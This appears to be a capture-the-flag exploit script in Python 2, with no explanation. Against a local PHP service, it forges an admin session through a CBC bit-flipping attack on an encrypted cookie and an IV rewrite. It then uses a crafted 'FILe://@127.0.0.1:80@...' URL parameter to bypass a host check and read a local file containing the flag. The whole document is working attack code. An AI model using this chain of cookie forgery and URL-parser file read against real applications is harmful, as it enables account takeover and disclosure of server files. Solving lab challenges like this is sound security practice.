1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
|
import urllib import requests import re import base64
url = "http://0.0.0.0:20001/" data = { "username":"1dmin", "password":"1231111", "submit":"Login" } r = requests.post(url=url,data=data) list = r.headers['Set-Cookie'].split(", ") iv = urllib.unquote(list[1][4:]) cipher = base64.b64decode(urllib.unquote(list[2][10:])) phpsessid = list[0].split(";")[0][10:] block = [] for i in range(0,len(cipher),16): block.append(cipher[i:i+16]) replace = chr(ord(block[0][9]) ^ ord('1') ^ ord('a')) block[0] = block[0][:9]+replace+block[0][10:] iv = base64.b64decode(iv) cipher_new = "" for i in range(0,len(block)): cipher_new += block[i]
cookie={ "PHPSESSID":phpsessid, "user_info":urllib.quote(base64.b64encode(cipher_new)), "key":urllib.quote(base64.b64encode(iv)) } s = requests.get(url=url,cookies=cookie) res_tr = r"<p>.*?</p>" m_tr = re.findall(res_tr,s.content) base = m_tr[0][3:-4] plain = base64.b64decode(base)[:16] want = 'a:2:{s:8:"userna' first_16 = '' for i in range(16): first_16 += chr(ord(plain[i]) ^ ord(iv[i]) ^ ord(want[i])) newiv = first_16
cookie={ "PHPSESSID":phpsessid, "user_info":urllib.quote(base64.b64encode(cipher_new)), "key":urllib.quote(base64.b64encode(newiv)) } k = requests.get(url=url,cookies=cookie) url2 = url+'mmman4g.php?url=FILe://@127.0.0.1:80@www.harmonyos.com/.//../../var/www/html/flag.php' cookie = { "PHPSESSID":phpsessid }
r = requests.get(url=url2,cookies = cookie) res_tr = r"'.*?}'" m_tr = re.findall(res_tr,r.content) print 'admin PHPSESSID:',phpsessid print m_tr[0][1:-1]
|